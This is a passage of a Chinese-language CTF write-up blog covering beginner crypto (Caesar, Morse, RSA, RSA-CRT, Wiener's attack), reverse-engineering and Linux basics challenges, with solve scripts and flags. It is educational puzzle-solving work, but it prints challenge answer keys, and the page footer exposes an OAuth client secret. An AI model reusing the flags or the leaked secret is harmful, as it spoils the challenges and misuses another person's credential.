Notice: This question is limited to the freshman , sophomore and above will not scored

qwlr&#123;G3cj_P4dj_NLp5lC_n1as3c&#125;</code></pre>
<p>flag被凯撒加密了，qwlr{G3cj_P4dj_NLp5lC_n1as3c}就是密文，解密即可</p>
<blockquote>
<p>flag{V3ry_E4sy_CAe5aR_c1ph3r}</p>
</blockquote>
<hr>
<h2 id="BabyCrypto2-100"><a href="#BabyCrypto2-100" class="headerlink" title="BabyCrypto2 (100)"></a>BabyCrypto2 (100)</h2><pre><code>This is a simple Morse Code!
Notice: This question is limited to the freshman , sophomore and above will not scored

Hint: All characters of flag are uppercase.

flag&#123;-... .- -... -.-- -- --- .-. ... . -.-. --- -.. .&#125;</code></pre>
<p>这次是被用摩斯电码加密了，也是直接解密即可，注意flag中所有的字符都是大写（莫斯电码不区分大小写）</p>
<blockquote>
<p>flag{BABYMORSECODE}</p>
</blockquote>
<hr>
<h2 id="RSA-150"><a href="#RSA-150" class="headerlink" title="RSA (150)"></a>RSA (150)</h2><pre><code>RSA is based on a simple formula, let&#39;s do a math problem.
c = 150815
d = 1941
N = 435979
what is the decrypted number?

Hint: flag&#39;s format is flag&#123;decrypted number&#125;</code></pre>
<p>这个题只是考察了RSA的解密公式<br><code>decrypted = c ^ d mod N</code></p>
<p>另外在RSA体系中，m、c、d、e、n这些的含义大都是固定的，随便找几篇文章就能懂。<br>最后结果为133337</p>
<blockquote>
<p>flag{133337}</p>
</blockquote>
<hr>
<h2 id="RSA2-250"><a href="#RSA2-250" class="headerlink" title="RSA2 (250)"></a>RSA2 (250)</h2><pre><code>This puzzle are different from the previous puzzle, what&#39;s the &quot;dq&quot; and &quot;dp&quot;? Can you decrypt the ciphertext?

c: 95272795986475189505518980251137003509292621140166383887854853863720692420204142448424074834657149326853553097626486371206617513769930277580823116437975487148956107509247564965652417450550680181691869432067892028368985007229633943149091684419834136214793476910417359537696632874045272326665036717324623992885
p: 11387480584909854985125335848240384226653929942757756384489381242206157197986555243995335158328781970310603060671486688856263776452654268043936036556215243
q: 12972222875218086547425818961477257915105515705982283726851833508079600460542479267972050216838604649742870515200462359007315431848784163790312424462439629
dp: 8191957726161111880866028229950166742224147653136894248088678244548815086744810656765529876284622829884409590596114090872889522887052772791407131880103961
dq: 3570695757580148093370242608506191464756425954703930236924583065811730548932270595568088372441809535917032142349986828862994856575730078580414026791444659</code></pre>
<p>和上一道题相比没有了d以及n，多了dp和dq，题目描述中也问了什么是dp以及dq，它们与中国剩余定理算法相关<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911211512.png"></p>
<ul>
<li>p和q是素数</li>
<li>dp = d mod (p - 1)</li>
<li>dq = d mod (q - 1)</li>
<li>qInv = (1/q) mod p （1/q为q的乘法逆元）</li>
<li>m1 = c^dp mod p</li>
<li>m2 = c^dq mod q</li>
<li>h = qInv * (m1 - m2) mod p</li>
<li>m = m2 + h * q</li>
</ul>
<p>现在直接按照上述步骤计算即可，p、q、dp、dq与c均已知，最后就能直接算出明文m，另外上述步骤中的qInv是模逆的</p>
<p>具体请参考：<a target="_blank" rel="noopener" href="https://www.di-mgt.com.au/crt_rsa.html">应用于RSA的中国剩余定理</a></p>
<p>脚本如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">egcd</span>(<span class="params">a, b</span>):</span></span><br><span class="line">    <span class="keyword">if</span> a == <span class="number">0</span>:</span><br><span class="line">        <span class="keyword">return</span> (b, <span class="number">0</span>, <span class="number">1</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        g, y, x = egcd(b % a, a)</span><br><span class="line">        <span class="keyword">return</span> (g, x - (b // a) * y, y)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">modinv</span>(<span class="params">a, m</span>):</span></span><br><span class="line">    g, x, y = egcd(a, m)</span><br><span class="line">    <span class="keyword">if</span> g != <span class="number">1</span>:</span><br><span class="line">        <span class="keyword">raise</span> Exception(<span class="string">&#x27;modular inverse does not exist&#x27;</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> x % m</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">c = <span class="number">95272795986475189505518980251137003509292621140166383887854853863720692420204142448424074834657149326853553097626486371206617513769930277580823116437975487148956107509247564965652417450550680181691869432067892028368985007229633943149091684419834136214793476910417359537696632874045272326665036717324623992885</span></span><br><span class="line">p = <span class="number">11387480584909854985125335848240384226653929942757756384489381242206157197986555243995335158328781970310603060671486688856263776452654268043936036556215243</span></span><br><span class="line">q = <span class="number">12972222875218086547425818961477257915105515705982283726851833508079600460542479267972050216838604649742870515200462359007315431848784163790312424462439629</span></span><br><span class="line">dp = <span class="number">8191957726161111880866028229950166742224147653136894248088678244548815086744810656765529876284622829884409590596114090872889522887052772791407131880103961</span></span><br><span class="line">dq = <span class="number">3570695757580148093370242608506191464756425954703930236924583065811730548932270595568088372441809535917032142349986828862994856575730078580414026791444659</span></span><br><span class="line"></span><br><span class="line">qinv = modinv(q, p)</span><br><span class="line">m1 = pow(c, dp, p)</span><br><span class="line">m2 = pow(c, dq, q)</span><br><span class="line">h = (qinv * (m1 - m2)) % p</span><br><span class="line">m = m2 + h * q</span><br><span class="line">m_hex = str(hex(m))[<span class="number">2</span>:<span class="number">-1</span>]</span><br><span class="line"><span class="keyword">print</span> <span class="string">&#x27;&#x27;</span>.join([chr(int(<span class="string">&#x27;&#x27;</span>.join(c), <span class="number">16</span>)) <span class="keyword">for</span> c <span class="keyword">in</span> zip(m_hex[<span class="number">0</span>::<span class="number">2</span>], m_hex[<span class="number">1</span>::<span class="number">2</span>])])</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>最后结果为<br>Theres_more_than_one_way_to_RSA</p>
<blockquote>
<p>flag{Theres_more_than_one_way_to_RSA}</p>
</blockquote>
<hr>
<h2 id="RSA3"><a href="#RSA3" class="headerlink" title="RSA3"></a>RSA3</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Normally, you pick e and generate d from that. What appears to have happened in this case? What is likely about the size of d?</span><br><span class="line"></span><br><span class="line">Update: Fixed bug of flag.</span><br><span class="line"></span><br><span class="line">Notice: Please DO NOT use any RSA tools, solve this challenge by yourself.</span><br><span class="line"></span><br><span class="line">e &#x3D; 165528674684553774754161107952508373110624366523537426971950721796143115780129435315899759675151336726943047090419484833345443949104434072639959175019000332954933802344468968633829926100061874628202284567388558408274913523076548466524630414081156553457145524778651651092522168245814433643807177041677885126141</span><br><span class="line">n &#x3D; 380654536359671023755976891498668045392440824270475526144618987828344270045182740160077144588766610702530210398859909208327353118643014342338185873507801667054475298636689473117890228196755174002229463306397132008619636921625801645435089242900101841738546712222819150058222758938346094596787521134065656721069</span><br><span class="line">c &#x3D; 169391604307213974710597693248166863262635321820709182280694059296079676696460036420655604420049971304712550027666676719989641872790226627271230072009450546099425697330508459430999175828530558172413805218170859212369467798719828240031394421896121823803700024559680572528969880625457942316782819682826344683732</span><br></pre></td></tr></table></figure>

<p>如果硬刚这到题的话，尝试直接分解n，可以发现n是非常难分解的，但是题目描述中重点强调了d的大小，那么可能和<a target="_blank" rel="noopener" href="https://en.wikipedia.org/wiki/Wiener%27s_attack">Wiener’s Attack</a>有关</p>
<p>当*<em>d &lt; 1/3 * N ^ (1/4)*</em> 时，可以用Wiener’s Attack获取私钥d</p>
<p>在生成私钥的时候，d是根据e而获得的，当e过大或者过小的话，可以利用低解密指数攻击快速分解n，获得d和m。具体算法以及证明过程见<a target="_blank" rel="noopener" href="https://www.tr0y.wang/2017/11/06/CTFRSA/index.html#%E4%BD%8E%E8%A7%A3%E5%AF%86%E6%8C%87%E6%95%B0%E6%94%BB%E5%87%BB">低解密指数攻击</a></p>
<blockquote>
<p>flag{Are_any_RSA_vals_good_87768438250}</p>
</blockquote>
<!--nextpage-->

<h1 id="REVERSE"><a href="#REVERSE" class="headerlink" title="REVERSE"></a>REVERSE</h1><h2 id="what-is-IDA-150"><a href="#what-is-IDA-150" class="headerlink" title="what is IDA? (150)"></a>what is IDA? (150)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">我有一个exe，你能找到flag吗?</span><br><span class="line"></span><br><span class="line">提示： IDA pro 6.8以上版本</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>下载一个IDA pro，用IDA(64位)载入该程序<br>反汇编main函数，只有个Ha Ha Ha<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911213232.png"><br>直接搜索字符串“flag”<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911213408.png"></p>
<blockquote>
<p>flag{can_y0u_see_me}</p>
</blockquote>
<hr>
<h2 id="Xor-180"><a href="#Xor-180" class="headerlink" title="Xor (180)"></a>Xor (180)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">flag就在文件里，为什么没有看到？</span><br><span class="line"></span><br><span class="line">注：异或运算</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>用IDA载入开始逆向程序，直接逆向main函数，得到源码如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> __cdecl <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> result; <span class="comment">// eax@10</span></span><br><span class="line">  __int64 v4; <span class="comment">// rsi@10</span></span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">int</span> i; <span class="comment">// [sp+Ch] [bp-34h]@1</span></span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">int</span> j; <span class="comment">// [sp+Ch] [bp-34h]@4</span></span><br><span class="line">  <span class="keyword">char</span> v7[<span class="number">40</span>]; <span class="comment">// [sp+10h] [bp-30h]@1</span></span><br><span class="line">  __int64 v8; <span class="comment">// [sp+38h] [bp-8h]@1</span></span><br><span class="line"></span><br><span class="line">  v8 = *MK_FP(__FS__, <span class="number">40L</span>L);</span><br><span class="line">  __isoc99_scanf(&amp;unk_8B4, v7, envp);</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i </span><br></pre></td></tr></table></figure>

<p>直接定位到第16行，不管v7是什么，它会和flag数组做一个对比，如果不一样就错误，所以flag数组里就放着flag，双击flag数组跳转<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911213924.png"><br>可以看到flag就放在这里，不过是以16进制，先把数据复制出来，再接着回去看上面的代码<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911214704.png"><br>可以看到flag长度为22，并且每个字符都和对应的0到21做了异或，由于异或是可逆的，因此将刚才复制出来的flag中每个字符都在异或一次即可</p>
<blockquote>
<p>flag{yes_you_know_Xor}</p>
</blockquote>
<hr>
<h2 id="Random"><a href="#Random" class="headerlink" title="Random"></a>Random</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Can a computer generate a truly random number?</span><br></pre></td></tr></table></figure>

<p>首先拖进IDA逆向main函数，需要使check()返回非0，另外可以看到flag的长度为32<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180924162538.png"></p>
<p>跟进check函数，可以发现程序对输入的字符串做了4件事<img src="/.io//TIM%E6%88%AA%E5%9B%BE20180924162749.png"></p>
<ol>
<li>给rand函数播种，种子为0xDEADBEEF，由于种子是固定的，所以random函数输出的随机数序列是固定的</li>
<li>将输入字符串按字节加<code>random() mod 0x40</code></li>
<li>将上一步的字符串按字节异或<code>random() mod 0x100</code></li>
<li>检查上述步骤完成后的字符串是否和byte_601080数组相等，其中byte_601080数组为<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180924163232.png"></li>
</ol>
<p>根据提示了解一下相关的资料就可以知道，glibc 的 <code>random()</code> 的实现使用线性同余引擎，在种子一定的情况下，会产生固定的伪随机序列。</p>
<p>所以只需要自己写个程序，设定种子为<code>0xdeadbeef</code>，就可以<code>random()</code>到相同的随机数，然后根据验证过程逆推即可得到flag。</p>
<blockquote>
<p>flag{R4nd0m_1s_P5euDo_randomW0W}</p>
</blockquote>
<hr>
<h1 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h1><h2 id="Welcome-50"><a href="#Welcome-50" class="headerlink" title="Welcome (50)"></a>Welcome (50)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">欢迎来到Blue-Whale纳新平台</span><br><span class="line">下面的这个东西叫做flag：</span><br><span class="line">flag&#123;Welcome_to_join_us&#125;</span><br><span class="line">所有题目的答案都是以上这个形式</span><br><span class="line">比如这题，把这个复制到答案框就好了</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>签到题，直接复制粘贴</p>
<blockquote>
<p>flag{Welcome_to_join_us}</p>
</blockquote>
<hr>
<h2 id="what-is-VM-100"><a href="#what-is-VM-100" class="headerlink" title="what is VM (100)"></a>what is VM (100)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">你知道虚拟机吗？</span><br><span class="line">我这里有一个VMware虚拟机镜像，怎么打开它呢？</span><br><span class="line">提示：下载VMware14：</span><br><span class="line">https:&#x2F;&#x2F;www.vmware.com&#x2F;products&#x2F;workstation-pro&#x2F;workstation-pro-evaluation.html</span><br><span class="line"></span><br><span class="line">镜像链接: https:&#x2F;&#x2F;pan.baidu.com&#x2F;s&#x2F;1uy0PkjE1Ik4xzklreg9ICQ</span><br><span class="line">密码: vxwg</span><br><span class="line"></span><br><span class="line">虚拟机：</span><br><span class="line">用户名：abc</span><br><span class="line">密码： 123456</span><br><span class="line"></span><br><span class="line">注意检查CPU虚拟化是否打开，没有打开的要在BIOS里打开。</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>下载安装VM14，打开下载的题目中的虚拟机<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180917224924.png"><br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180917225713.png"><br>之后开启虚拟机，用题目给的用户名和密码登录，登陆后桌面上就是一个flag<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180919213440.png"></p>
<blockquote>
<p>flag{you_know_how_to_use_VM}</p>
</blockquote>
<hr>
<h2 id="what-is-command-100"><a href="#what-is-command-100" class="headerlink" title="what is command (100)"></a>what is command (100)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">home目录下有一个flag文件，怎么用命令找到它呢？</span><br><span class="line"></span><br><span class="line">注：此题Linux镜像为第二题镜像</span><br></pre></td></tr></table></figure>
<p>因为flag是隐藏文件，直接用<code>ls</code>命令是找不到的，得用<code>ls -al</code>命令显示所有文件，之后用<code>cat</code>命令打开即可<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180919213746.png"></p>
<blockquote>
<p>flag{ls_is_what}</p>
</blockquote>
<hr>
<h2 id="Linux-find-100"><a href="#Linux-find-100" class="headerlink" title="Linux find (100)"></a>Linux find (100)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">我在某个目录中藏了一个叫findme的文件，怎么能找到它呢？</span><br><span class="line"></span><br><span class="line">注：此题Linux镜像为第二题镜像</span><br></pre></td></tr></table></figure>
<p>直接用find命令即可<br><code>sudo find / -name findme -print</code><br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180919214153.png"></p>
<blockquote>
<p>flag{you_know_wh1s_f1nd}</p>
</blockquote>
<hr>
<h2 id="what-is-nc-100"><a href="#what-is-nc-100" class="headerlink" title="what is nc? (100)"></a>what is nc? (100)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">linux nc命令是干什么的呢？</span><br><span class="line">nc 144.202.124.195 10001</span><br></pre></td></tr></table></figure>
<p>直接用nc命令<br><code>nc 144.202.124.195 10001</code><br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180919213522.png"></p>
<blockquote>
<p>flag{nc_1s_this}</p>
</blockquote>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/BlueWhale/" rel="tag"># BlueWhale</a>
              <a href="/tags/WriteUp/" rel="tag"># WriteUp</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2018/09/21/BlueWhale-2018-Web-%E6%96%B0%E7%94%9F%E5%9F%B9%E8%AE%AD%E5%A4%A7%E7%BA%B2/" rel="prev" title="BlueWhale 2018 Web 新生培训大纲">
      <i class="fa fa-chevron-left"></i> BlueWhale 2018 Web 新生培训大纲
    </a></div>
      <div class="post-nav-item">
    <a href="/2018/10/27/Hitcon-2018-BabyCake-Writeup/" rel="next" title="Hitcon 2018 BabyCake Writeup">
      Hitcon 2018 BabyCake Writeup <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Forensics"><span class="nav-number">1.</span> <span class="nav-text">Forensics</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#BabyForensics-200"><span class="nav-number">1.1.</span> <span class="nav-text">BabyForensics (200)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Mail1-500"><span class="nav-number">1.2.</span> <span class="nav-text">Mail1 (500)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Mail2-500"><span class="nav-number">1.3.</span> <span class="nav-text">Mail2 (500)</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#PPC"><span class="nav-number">2.</span> <span class="nav-text">PPC</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9F%A5%E6%89%BE%E7%B4%A0%E6%95%B0-150"><span class="nav-number">2.1.</span> <span class="nav-text">查找素数 (150)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%8B%E8%90%BD%E7%9A%84%E5%B0%8F%E7%90%83-180"><span class="nav-number">2.2.</span> <span class="nav-text">下落的小球 (180)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AF%86%E7%A0%81%E7%94%9F%E6%88%90-200"><span class="nav-number">2.3.</span> <span class="nav-text">密码生成 (200)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%AA%8C%E8%AF%81%E7%A0%81%E7%A0%B4%E8%A7%A3-350"><span class="nav-number">2.4.</span> <span class="nav-text">验证码破解 (350)</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Web"><span class="nav-number">3.</span> <span class="nav-text">Web</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#cookie-150"><span class="nav-number">3.1.</span> <span class="nav-text">cookie (150)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#BabySQLi-200"><span class="nav-number">3.2.</span> <span class="nav-text">BabySQLi (200)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#BabyBurp-200"><span class="nav-number">3.3.</span> <span class="nav-text">BabyBurp (200)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#EasySQLi-220"><span class="nav-number">3.4.</span> <span class="nav-text">EasySQLi (220)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#HardSQLi-250"><span class="nav-number">3.5.</span> <span class="nav-text">HardSQLi (250)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#BadSQLi-300"><span class="nav-number">3.6.</span> <span class="nav-text">BadSQLi (300)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RealSQL"><span class="nav-number">3.7.</span> <span class="nav-text">RealSQL</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exec"><span class="nav-number">3.8.</span> <span class="nav-text">Exec</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Crypto"><span class="nav-number">4.</span> <span class="nav-text">Crypto</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#BabyCrypto-100"><span class="nav-number">4.1.</span> <span class="nav-text">BabyCrypto (100)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#BabyCrypto2-100"><span class="nav-number">4.2.</span> <span class="nav-text">BabyCrypto2 (100)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RSA-150"><span class="nav-number">4.3.</span> <span class="nav-text">RSA (150)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RSA2-250"><span class="nav-number">4.4.</span> <span class="nav-text">RSA2 (250)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RSA3"><span class="nav-number">4.5.</span> <span class="nav-text">RSA3</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#REVERSE"><span class="nav-number">5.</span> <span class="nav-text">REVERSE</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#what-is-IDA-150"><span class="nav-number">5.1.</span> <span class="nav-text">what is IDA? (150)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Xor-180"><span class="nav-number">5.2.</span> <span class="nav-text">Xor (180)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Random"><span class="nav-number">5.3.</span> <span class="nav-text">Random</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISC"><span class="nav-number">6.</span> <span class="nav-text">MISC</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Welcome-50"><span class="nav-number">6.1.</span> <span class="nav-text">Welcome (50)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#what-is-VM-100"><span class="nav-number">6.2.</span> <span class="nav-text">what is VM (100)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#what-is-command-100"><span class="nav-number">6.3.</span> <span class="nav-text">what is command (100)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Linux-find-100"><span class="nav-number">6.4.</span> <span class="nav-text">Linux find (100)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#what-is-nc-100"><span class="nav-number">6.5.</span> <span class="nav-text">what is nc? (100)</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Srpopty</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">19</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Srpopty" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Srpopty" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:srpopty@outlook.com" title="E-Mail → mailto:srpopty@outlook.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 2016 – 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Srpopty</span>
</div>

        








      </div>
    </footer>
  </div>

  
  
  <script color='255,255,255' opacity='1' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : 'fb9b672afa74e328fbe8',
      clientSecret: '7b3efe103d7e694008b943a67e5273ad36ee14a0',
      repo        : 'srpopty.github.io',
      owner       : 'Srpopty',
      admin       : ['Srpopty'],
      id          : '692eaba8f664f916ff2f8585e227a4cd',
        language: 'en',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script><!-- hexo-inject:begin --><!-- hexo-inject:end -->

</body>
</html>
